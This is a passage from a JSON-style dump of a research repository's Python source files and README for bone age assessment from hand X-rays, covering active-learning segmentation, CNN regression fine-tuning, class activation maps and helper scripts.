shuffle_data(data_x, data_y):\n n_data = 
data_x.shape[0]\n new_indexes = np.random.permutation(n_data)\n return data_x[new_indexes], data_y[new_indexes], new_indexes\n\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef similarity_cosine(vec1, vec2):\n vec1 = np.array(vec1).flatten()\n vec2 = np.array(vec2).flatten()\n return np.dot(vec1, vec2) / (np.sqrt((vec1**2).sum()) * np.sqrt((vec2**2).sum()))\n\n\ndef euler_distance(vec1, vec2):\n return np.sum(np.power(np.subtract(vec1, vec2), 2))\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\nif __name__ == '__main__':\n #load_annotated_data(data_dir=RSNA_GT, return_ids=True)\n load_unannotated_data(data_dir=RSNA_DATA_DIR, annotated_ids=[])" }, { "alpha_fraction": 0.682692289352417, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 34, "blob_id": "599219149590c831038ea045ffff4ebaab1c0e20", "content_id": "508ee15ee6a48bbf0a5470bfb5febc616de6321a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/vallina_transfer_learning/config.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "RSNA_TRAIN_CSV = \"./data/csv/train.csv\"\nRSNA_TRAIN_DATA = \"./data/boneage-training-dataset\"\nSCALE = 228." }, { "alpha_fraction": 0.5826042294502258, "alphanum_fraction": 0.5903242230415344, "avg_line_length": 34.6422004699707, "blob_id": "eb49eafca99434fca880f7111b4c1d1cb4299f3f", "content_id": "0d9abb86609c927e39d2603319535143454c3bf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3886, "license_type": "no_license", "max_line_length": 106, "num_lines": 109, "path": "/al_segmentation/step1_corase_segment.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from glob import glob\nimport os\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport argparse\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\nfrom skimage import morphology, measure\nfrom skimage.filters import threshold_otsu\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom config import *\n\n\ndef load_and_pad(data_file):\n img = cv2.imread(data_file, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img, pad_tuple, mode=\"constant\")\n return padded\n\n\ndef image_enhance_seg(img_files, dilation_k=(5, 5), single_dir=False):\n for i in tqdm(range(len(img_files))):\n data_img_file = img_files[i]\n file_name = data_img_file[data_img_file.rfind(\"/\")+1:data_img_file.rfind(\".\")]\n print \"[x] processing image file %s \" % file_name\n\n img = Image.open(data_img_file)\n img = img.convert('L')\n ori_img = img.convert('L')\n\n enh_bri = ImageEnhance.Brightness(img)\n brightness = 5\n img = enh_bri.enhance(brightness)\n img = np.array(img)\n\n # OTSU\n thresh = threshold_otsu(img)\n binary = img > thresh * THRESH_RATIO\n binary = morphology.dilation(binary, selem=np.ones(dilation_k))\n\n labels = 
measure.label(binary)\n        regions = measure.regionprops(labels)\n        labels = [(r.area, r.label) for r in regions]\n        if len(labels) > 1:\n            labels.sort(reverse=True)\n            max_area = labels[1][0]\n            for r in regions:\n                if r.area <= max_area:\n                    for c in r.coords:\n                        binary[c[0], c[1]] = False\n\n        binary = morphology.dilation(binary, selem=np.ones(dilation_k))\n\n        if single_dir:\n            save_dir = RSNA_SEGMENT_SAVE_DIR + \"{}/\".format(file_name)\n        else:\n            save_dir = RSNA_SEGMENT_SAVE_DIR\n        if not os.path.isdir(save_dir):\n            os.makedirs(save_dir)\n\n        # cropped img\n        plt.imsave(fname=save_dir + file_name + \"_ori.png\", arr=np.array(ori_img), cmap=\"gray\")\n        padded_ori_img = load_and_pad(save_dir + file_name + \"_ori.png\")\n        plt.imsave(fname=save_dir + file_name + \"_pad_ori.png\", arr=padded_ori_img, cmap=\"gray\")\n\n        plt.imsave(fname=save_dir + file_name + \"_bin.png\", arr=binary, cmap=plt.cm.bone)\n        padded_bin_img = load_and_pad(save_dir + file_name + \"_bin.png\")\n        plt.imsave(fname=save_dir + file_name + \"_pad_bin.png\", arr=padded_bin_img, cmap=plt.cm.bone)\n\n        img_seg = np.multiply(ori_img, binary)\n        plt.imsave(fname=save_dir + file_name + \"_seg.png\", arr=img_seg, cmap=\"gray\")\n        padded_seg_img = load_and_pad(save_dir + file_name + \"_seg.png\")\n        plt.imsave(fname=save_dir + file_name + \"_pad_seg.png\", arr=padded_seg_img, cmap=\"gray\")\n\n\nif __name__ == \"__main__\":\n\n    data_img_files = glob(RSNA_DATA_DIR + \"*.png\")\n    if not os.path.isdir(RSNA_SEGMENT_SAVE_DIR):\n        os.makedirs(RSNA_SEGMENT_SAVE_DIR)\n    n_images = len(data_img_files)\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--num_process', type=int, help=\"number of process to run code\", default=4)\n    FLAGS = parser.parse_args()\n    num_process = FLAGS.num_process\n\n    if num_process > 1:\n        p = Pool()\n        for i in range(num_process):\n            if i < num_process-1:\n                sub_image_files = data_img_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n            else:\n                sub_image_files = data_img_files[i*(n_images//num_process):]\n            p.apply_async(image_enhance_seg, args=(sub_image_files, (5, 5), False))\n\n        p.close()\n        p.join()\n    else:\n        image_enhance_seg(data_img_files)\n\n" }, { "alpha_fraction": 0.7797867655754089, "alphanum_fraction": 0.7992582321166992, "avg_line_length": 101.76190185546875, "blob_id": "c07bdd05574fd5bdf7cea84f60ddffe1387ced60", "content_id": "c14dc51a66a7c47e9a7cc37ec3f2267886be5bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 289, "num_lines": 21, "path": "/README.MD", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "# Bone Age Assessment via Deep Learning Techniques\nIn this paper, we use an active learning and query-by-committee strategy to actively select training samples and segment hands from the original X-ray images.\n\nWe define the bone age assessment task as a regression task. With the segmented results, we fine-tune three state-of-the-art multi-scale CNN models, Inception v3, Inception-ResNet v2 and Xception, to predict the real bone age of each X-ray image.\n\nCode Usage for AL segmentation\n1. run al_segmentation/step1_corase_segment.py to generate a coarse segmentation with traditional image preprocessing methods, including OTSU thresholding and giant-component extraction.\n2. run al_segmentation/step2_interactive_segmentation.py to run the interactive program. After each training epoch, the oracle manually segments the most uncertain samples (see the query-by-committee sketch after this file) and adds them to the training set.\n Before the next training epoch, the oracle can use the script step2_image_2_h5.py to add the newly annotated samples to the training set. Note that in this interactive process, new data should be located at `RSNA_GT_NEW = \"../data/gt/new\"`, named `xxx.png` (original) and `xxx_bin.png` (ground truth).\n3. run al_segmentation/step3_check_data.py to make sure all 12611 segmented hand images are present.\n4. run al_segmentation/step3_gen_segmentation_result.py to use the trained segmentation model to infer segmentation results.\n5. run al_segmentation/step3_gen_segmentation_with_enhance.py to generate the final segmentation results. The segmented hands will be located at `RSNA_SEG_ALL=\"../data/segment_all\"` with a size of 512*512.\n6. run step4_regression_multi_gpu.py to fine-tune the pretrained CNN models and perform BAA.\n7. run step4_regression_with_cam.py to train the model, then run step6_cam.py to generate CAMs.\n8. run step5_statiscal_data.py to gather statistics of the training results, including MAE, MSE and other metrics.\n\nCode Usage for paced transfer learning.\n1. run paced_transfer/step1_ptl_gen.py to train the BAA model with PTL\n2. run paced_transfer/step2_conventional_transfer.py to train the BAA model without PTL\n3. run paced_transfer/step5_cam_inference.py to generate CAM results\n4. run paced_transfer/step6_visualize.py to generate training loss figures" }
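The interactive annotation script itself (step2_interactive_segmentation.py) is not reproduced in this section, so the snippet below only sketches the query-by-committee selection idea referenced in the README: a committee of segmentation models votes on every unlabeled image, and the images with the highest pixel-wise prediction variance are handed to the oracle. All names here (committee, most_uncertain) are hypothetical; AL_UNCERTAINTY_NUM = 10 from config.py is a plausible value for n_query.

import numpy as np


def most_uncertain(committee, unlabeled_x, n_query=10):
    # committee: list of trained Keras models mapping (N, H, W, 1) images to
    # (N, H, W, 1) foreground probabilities.
    predictions = np.stack([m.predict(unlabeled_x) for m in committee], axis=0)
    # Disagreement score per image: mean pixel-wise variance across the committee.
    disagreement = predictions.var(axis=0).mean(axis=(1, 2, 3))
    # Indices of the images the oracle should annotate next.
    return np.argsort(disagreement)[-n_query:]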
, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 16, "blob_id": "78e8ad745542d0040d88d4496ba782640bff4a63", "content_id": "3f46a00bd91e77b394319886920c0d46d20e84a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/paced_transfer/step3_plot.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\nfrom utils_data import load_obj\n" }, { "alpha_fraction": 0.6063756346702576, "alphanum_fraction": 0.6242508292198181, "avg_line_length": 39.64788818359375, "blob_id": "4136241a0310b50e48498da6833246558aeabfad", "content_id": "2e474fcd30fd370071e4e5a33f87682e4548d8cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5772, "license_type": "no_license", "max_line_length": 120, "num_lines": 142, "path": "/al_segmentation/step6_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import cv2\nimport argparse\nimport numpy as np\nimport os\nimport time\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.resnet50 import preprocess_input as resnet_50_input\n\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.vgg16 import preprocess_input as vgg16_input\n\nfrom keras.applications.vgg19 import VGG19\nfrom keras.applications.vgg19 import preprocess_input as vgg19_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom utils_data import load_obj\nfrom step4_regression_with_cam
import _build_regresser, load_sample_data\n\nfrom tqdm import tqdm\n\n\n########################################CAM#############################################################################\ndef predict_on_weights(out_base, weights):\n gap = np.average(out_base, axis=(0, 1))\n logit = np.dot(gap, np.squeeze(weights))\n return 1 / (1 + np.e ** (-logit))\n\n\ndef getCAM(image, feature_maps, weights, plot_name=\"\"):\n predict = predict_on_weights(feature_maps, weights)\n\n # Weighted Feature Map\n cam = (predict - 0.5) * np.matmul(feature_maps, weights)\n # Normalize\n cam = (cam - cam.min()) / (cam.max() - cam.min())\n # Resize as image size\n cam_resize = cv2.resize(cam, (image.shape[0], image.shape[1]))\n # Format as CV_8UC1 (as applyColorMap required)\n cam_resize = 255 * cam_resize\n cam_resize = cam_resize.astype(np.uint8)\n # Get Heatmap\n heatmap = cv2.applyColorMap(cam_resize, cv2.COLORMAP_JET)\n # Zero out\n heatmap[np.where(cam_resize <= 100)] = 0\n\n image = (image+128)\n out = cv2.addWeighted(src1=image, alpha=0.8, src2=heatmap, beta=0.4, gamma=0)\n out = cv2.resize(out, dsize=(400, 400))\n\n if plot_name != \"\":\n cv2.imwrite(plot_name, out)\n return out\n\n\ndef batch_CAM(weights, data, base_model, original_int_images):\n idx = 0\n data_count = data.shape[0]\n result = None\n for j in range(int(np.sqrt(data_count))):\n for i in range(int(np.sqrt(data_count))):\n # src = data[idx][:, :, ::-1]\n src = data[idx]\n out_base = base_model.predict(np.expand_dims(src, axis=0))\n out_base = out_base[0]\n ori = original_int_images[idx]\n out = getCAM(image=ori, feature_maps=out_base, weights=weights)\n out = cv2.resize(out, dsize=(300, 300))\n if i > 0:\n canvas = np.concatenate((canvas, out), axis=1)\n else:\n canvas = out\n idx += 1\n if j > 0:\n result = np.concatenate((result, canvas), axis=0)\n else:\n result = canvas\n return result\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=32)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"false\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--num_gpu', type=int, default=1)\n FLAGS = parser.parse_args()\n\n num_gpu = FLAGS.num_gpu\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir = \"E{}_M{}_S{}_A{}_F{}/cam\".format(exp_name, model_name, sex, augment_data, fine_tune)\n\n if not os.path.isdir(cam_out_dir):\n os.makedirs(cam_out_dir)\n\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n print \"[x] load saved model 
file\"\n weights_history = load_obj(model_out_dir + \"/weights_history.pkl\")\n model, input_shape, base_model = _build_regresser(model_name, weights=\"imagenet\", num_gpu=1, fine_tune=fine_tune)\n base_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\n\n sampled_x, sampled_y, sampled_original_int_images = load_sample_data(sex=sex,\n img_size=input_shape[0],\n preprocess_fn=preprocess_fn)\n\n file_name = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime(time.time())) + \".mp4\"\n print \"[x] saving file to {}/{}\".format(cam_out_dir, file_name)\n file_path = \"{}/{}\".format(cam_out_dir, file_name)\n\n fourcc = cv2.VideoWriter_fourcc(*'MP4V')\n out = cv2.VideoWriter(file_path, fourcc, 20.0, (1200, 1200))\n for weight in tqdm(weights_history):\n img = batch_CAM(weight, sampled_x, base_model, sampled_original_int_images)\n out.write(img)\n out.release()\n cv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.44245049357414246, "alphanum_fraction": 0.4560643434524536, "avg_line_length": 27.875, "blob_id": "bd2c4b807b59fbf46820a1e9141a61fbf459da19", "content_id": "2b1a7468e67d48902ea158c75c4904585a9e40ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1616, "license_type": "no_license", "max_line_length": 123, "num_lines": 56, "path": "/paced_transfer/sh_generator.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from config import *\n\ntemplete = \"python step1_paced_transfer_learning.py \" \\\n \"--exp=regression \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={}\"\n\ntemplete2 = \"python step1_ptl_multithread.py \" \\\n \"--exp=RM \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--data_thread_num={}\"\n\ntemplete_ptl = \"python step1_ptl_gen.py \" \\\n \"--exp={} \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--n_epoch={} \"\n\n\ntemplete_ctl = \"python step2_conventional_transfer.py \" \\\n \"--exp={} \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--n_epoch={} \"\n\nimg_sizes = [299]\nbatch_size = 32\nsexs = [\"0\", \"1\", \"2\"]\nstart_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n\ngpu_id = 7\nn_epoch = 50\nfor sex in sexs:\n for img_size in img_sizes:\n for start_layer in start_layers:\n print templete_ptl.format(\"PTL\", img_size, gpu_id, sex, batch_size, start_layer, n_epoch)\n\ngpu_id = 6\nn_epoch = 250\nfor sex in sexs:\n for img_size in img_sizes:\n for start_layer in start_layers:\n print templete_ctl.format(\"CTL{}\".format(start_layer), img_size, gpu_id, sex, batch_size, start_layer, n_epoch)" }, { "alpha_fraction": 0.7386130690574646, "alphanum_fraction": 0.7484612464904785, "avg_line_length": 35.92424392700195, "blob_id": "c9dcdd6e6680844533ae26255691185d7431b28b", "content_id": "4d3efb11088ba262eec9830914a8f852deee9cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2437, "license_type": "no_license", "max_line_length": 93, "num_lines": 66, "path": "/paced_transfer/step5_cam_inference.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport 
tensorflow as tf\nimport cv2\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.models import Model\nfrom keras import optimizers\nfrom keras.layers import GlobalAveragePooling2D, Dense\nfrom tqdm import tqdm\nimport keras\n\nfrom utils_data import load_sex_ids, load_obj, load_data_sex\nfrom config import *\nfrom step4_cam import inference\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"CAM\")\nparser.add_argument('--img_size', type=int, help=\"image size\", default=128)\nparser.add_argument('--gpu_id', type=int, default=0)\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\nparser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\nparser.add_argument('--start_layer', type=int, help=\"start_layer\", default=-1)\nFLAGS = parser.parse_args()\n\nexp_name = FLAGS.exp\ngpu_id = FLAGS.gpu_id\nimg_size = FLAGS.img_size\nbatch_size = FLAGS.batch_size\nsex = FLAGS.sex\nstart_layer = FLAGS.start_layer\n\n\nmodel_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\ninference_out_dir = \"E{}_S{}_IMG_{}/cam\".format(exp_name, sex, img_size)\n\ninput_shape = (img_size, img_size, 3)\nbase_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\nbase_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\npredictions = Dense(1, activation=keras.activations.relu)(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\nmodel.load_weights(model_out_dir+\"/model.h5\")\noptimizer = optimizers.RMSprop(lr=5E-4, decay=0.95)\nmodel.compile(optimizer=optimizer, loss='mean_absolute_error')\n\n\nprint \"[x] building models on GPU {}\".format(gpu_id)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nset_session(tf.Session(config=config))\n\nprint \"load model and data\"\ndata_ids = load_sex_ids(sex)\ndata_x, data_y = load_data_sex(sex, img_size, xception_input)\nweights_history = load_obj(model_out_dir+\"/weights.pkl\")\n\nprint \"inference\"\ninference(data_ids, data_y, base_model, weights_history, img_size)\n" }, { "alpha_fraction": 0.561430811882019, "alphanum_fraction": 0.5894245505332947, "avg_line_length": 28.272727966308594, "blob_id": "79ee9bc66fc255e78d51923acba4625ae4a77596", "content_id": "4064aa6a2a916f44cfb1d01ea894990fda133ab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 149, "num_lines": 22, "path": "/al_segmentation/sh_generator.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from config import *\n\ntemplete = \"python step4_regression_multi_gpu.py --exp=regression3 --batch_size={} --model_name={} --sex={} --augment={} --fine_tune={} --num_gpu={}\"\n\n\nnum_gpu = 5\nbatch_size = 32\nmodel_names = [\"inception_v3\", \"inception_resnet_v2\", \"xception\"]\nsexs = [\"0\", \"1\", \"2\"]\n# fine_tunes = [\"0\", \"1\", \"2\", \"3\"]\nfine_tunes = [\"0\", \"3\"]\naugments = [\"true\"]\n\ncount = 0\nfor model_name in model_names:\n for sex in sexs:\n for augment in augments:\n for fine_tune in fine_tunes:\n count += 1\n print 
templete.format(batch_size, model_name, sex, augment, fine_tune, num_gpu)\n\nprint count" }, { "alpha_fraction": 0.5204567313194275, "alphanum_fraction": 0.5305423140525818, "avg_line_length": 47.21100997924805, "blob_id": "aa2ec271b715dfe2de2c11a51eea198f6ba879cc", "content_id": "fa7ab93598f8c106695d3853b01785fa5f110948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5255, "license_type": "no_license", "max_line_length": 145, "num_lines": 109, "path": "/vallina_transfer_learning/utils_data_gen.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\nfrom config import *\n\n\ndef _build_img_generator(model_name=\"inception_v3\"):\n from keras.preprocessing.image import ImageDataGenerator\n if model_name == \"inception_v3\":\n from keras.applications.inception_v3 import preprocess_input\n elif model_name == \"inception_resnet_v2\":\n from keras.applications.inception_resnet_v2 import preprocess_input\n elif model_name == \"xception\":\n from keras.applications.xception import preprocess_input\n else:\n raise ValueError(\"Not support {}\".format(model_name))\n\n core_idg = ImageDataGenerator(samplewise_center=False,\n samplewise_std_normalization=False,\n horizontal_flip=True,\n vertical_flip=False,\n height_shift_range=0.2,\n width_shift_range=0.2,\n rotation_range=5,\n shear_range=0.01,\n fill_mode='nearest',\n zoom_range=0.25,\n preprocessing_function=preprocess_input)\n\n return core_idg\n\n\ndef _flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n df_gen = img_data_gen.flow_from_directory(base_dir, class_mode='sparse', **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\n\n\ndef _load_data(sex=0, img_path=RSNA_TRAIN_DATA, num_sample_per_category=500):\n if sex == 0:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n elif sex == 1:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n dataset_df = dataset_df[dataset_df.male==True]\n else:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n dataset_df = dataset_df[dataset_df.male==False]\n\n dataset_df['path'] = dataset_df['id'].map(lambda x: os.path.join(img_path ,'{}.png'.format(x)))\n dataset_df['exists'] = dataset_df['path'].map(os.path.exists)\n print(dataset_df['exists'].sum(), 'images found of', dataset_df.shape[0], 'total')\n\n boneage_mean = dataset_df['boneage'].mean()\n boneage_std = 2*dataset_df['boneage'].std()\n\n print \"dataset mean: {}, dataset std: {}\".format(boneage_mean, boneage_std)\n dataset_df['boneage_zscore'] = dataset_df['boneage'].map(lambda x: (x-boneage_mean)/boneage_std)\n dataset_df.dropna(inplace=True)\n dataset_df['boneage_category'] = pd.cut(dataset_df['boneage'], 20)\n\n train_df, validation_df = train_test_split(dataset_df, test_size=0.25, random_state=2018, stratify=dataset_df['boneage_category'])\n new_train_df = train_df.groupby(['boneage_category']).apply(lambda x: x.sample(num_sample_per_category, replace=True)).reset_index(drop=True)\n print \"new data size : {}, old data size: {}\".format(new_train_df.shape[0], train_df.shape[0])\n\n return train_df, 
validation_df, boneage_mean, boneage_std\n\n\ndef build_data_generator(model_name=\"inception_v3\",\n sex=0,\n img_path=RSNA_TRAIN_DATA,\n num_per_category=500,\n img_size=512,\n batch_size=32):\n img_generator = _build_img_generator(model_name)\n img_sizes = (img_size, img_size)\n train_data_df, validation_data_df, mean, std = _load_data(sex=sex,\n img_path=img_path,\n num_sample_per_category=num_per_category)\n train_gen = _flow_from_dataframe(img_generator, train_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=batch_size)\n\n valid_gen = _flow_from_dataframe(img_generator, validation_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=batch_size) # we can use much larger batches for evaluation\n test_X, test_Y = next(_flow_from_dataframe(img_generator,\n validation_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=1000)) # one big batch\n return train_gen, valid_gen, mean, std, test_X, test_Y\n" }, { "alpha_fraction": 0.598504364490509, "alphanum_fraction": 0.6111289858818054, "avg_line_length": 38.479366302490234, "blob_id": "24f354d640005464aff6940334df6f26c986e797", "content_id": "237507a3030e7f9fdf6378111bad6bf5aab58662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12436, "license_type": "no_license", "max_line_length": 126, "num_lines": 315, "path": "/al_segmentation/step4_regression_with_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport argparse\nimport os\nimport pprint\nimport pickle\nimport keras\nimport sys\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\n\nfrom step4_regression_multi_gpu import load_data\nfrom config import *\nfrom utils_data import save_obj, load_obj\n\n\ndef regression_metric(y_true, y_pred):\n # explained_variance_score\n evs = explained_variance_score(y_true, y_pred)\n # mean_absolute_error\n mae = mean_absolute_error(y_true, y_pred)\n # mean_squared_error\n mse = mean_squared_error(y_true, y_pred)\n # median_absolute_error\n meae = median_absolute_error(y_true, y_pred)\n # r^2_score\n r2s = r2_score(y_true, y_pred)\n ccc = _ccc(y_true, y_pred)\n return evs, mae, mse, meae, r2s, ccc\n\n\ndef _ccc(y_true, y_pred):\n x_mean = np.average(y_true)\n y_mean = np.average(y_pred)\n n = y_true.shape[0]\n s_xy = np.sum(np.multiply(y_true-x_mean, y_pred-y_mean)) / n\n s_x2 = np.sum([np.power(e, 2) for e in (y_true - x_mean)]) / n\n s_y2 = np.sum([np.power(e, 2) 
for e in (y_pred - y_mean)]) / n\n return 2*s_xy / (s_x2+s_y2+np.power(x_mean-y_mean, 2))\n\n\ndef load_sample_data(data_ids=None, sex=0, img_size=256, preprocess_fn=xception_input, sample_count=16):\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all\"\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n if sex == 0:\n boneages = dataset_df.boneage\n ids = dataset_df.id\n elif sex == 1:\n boneages = dataset_df[dataset_df.male == True].boneage\n ids = dataset_df[dataset_df.male == True].id\n elif sex == 2:\n boneages = dataset_df[dataset_df.male == False].boneage\n ids = dataset_df[dataset_df.male == False].id\n\n bas_l = []\n ids_l = []\n\n n_data = len(ids)\n for i in range(len(ids)):\n boneage = boneages.ix[boneages.index[i]]\n ids_l.append(ids.ix[ids.index[i]])\n bas_l.append(boneage)\n\n if data_ids == None:\n # random sample 16 data\n selected_indexes = np.random.permutation(range(n_data))[:sample_count]\n selected_ids = []\n for i in range(len(ids)):\n if i in selected_indexes:\n selected_ids.append(ids_l[i])\n else:\n selected_ids = data_ids\n\n x = []\n original_int_images = []\n y = []\n for i in tqdm(range(n_data)):\n id = ids_l[i]\n if id in selected_ids:\n boneage = bas_l[i]\n img_file_name = data_dir + \"/{}_seg.png\".format(id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n original_int_images.append(np.array(ori_img, dtype=np.uint8))\n img = np.array(img, 